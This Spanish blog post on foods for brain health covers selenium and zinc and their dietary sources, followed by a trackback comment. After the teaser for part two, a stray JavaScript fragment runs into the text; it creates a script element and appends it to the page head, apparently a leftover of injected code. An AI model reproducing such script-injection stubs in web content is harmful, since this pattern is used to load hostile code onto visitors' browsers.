Salud y belleza » Alimentación

Comida para pensar (I)

1 Comentario

Si corremos, luego estiramos; si realizamos flexiones de brazo, al terminar, efectuamos ejercicios para estirar los músculos; y si hacemos un deporte como la natación nos recuperamos gracias a una alimentación sana al instante de concluida esa actividad.

¿Acaso entonces no merece el mismo cuidado el cerebro que, incluso, nunca dejamos de utilizarlo ni le otorgamos un descanso, un respiro? Se ha comprobado que existen una serie de alimentos que ayudan a potenciar la salud cerebral; hablamos de un grupo de elementos (incluidos en ciertas comidas) de vital importancia para la recuperación tras una jornada de ideas, pensamiento e, incluso, divagues.

Proponemos un repaso -aquí la primera parte- de esos elementos nutricionales tan importantes…

Selenio: representa un elemento básico para la salud cerebral, estímula diferentes centros. Esta clase de nutrientes se encuentra en alimentos como los pescados, los huevos, los cereales integrales, el germen de trigo, los champiñones y ciertas verduras como el ajo.

Zinc: la carencia de este mineral puede ocasionar serias bajas en la actividad cerebral (problemas de memoria, concentración, etc.). Grandes fuentes de Zinc se hallan en mariscos, carne, la yema de huevo, la levadura de cerveza, las nueces, los champiñones y algunas verduras (espinacas).

¡No te pierdas la segunda parte de la guía con muchos datos más!var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

One Comment »

  • Comidas para mejorar la salud cerebral said:

    [...] De la boca al cerebro hay poca distancia. Aún así, dependiendo de lo que se coma, la ruta puede volverse eterna. Existen alimentos que pueden ayudar a mejorar las funciones cerebrales, a mantener la cabeza despierta, así como también hay tantos otros que no aportan absolutamente nada (algo que ya hemos repasado en articulos anteriores). [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.